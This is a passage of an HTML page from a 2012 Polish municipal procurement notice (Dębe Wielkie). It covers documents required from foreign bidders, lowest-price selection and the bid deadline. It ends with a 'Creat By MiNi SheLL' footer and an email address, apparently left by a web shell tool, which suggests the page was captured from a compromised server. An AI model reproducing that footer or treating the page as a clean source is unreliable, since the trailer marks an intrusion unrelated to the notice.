<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Referencje</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o spełnaianiu warunków udziału w postępowaniu, prafowany projekt umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.debewielkie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dębe Wielkie
ul. Strażacka 3
05-311 Dębe Wielkie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2012 godzina 10:00, miejsce: Urząd Gminy Dębe Wielkie
ul. Strażacka 3
05-311 Dębe Wielkie
pokój 34 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com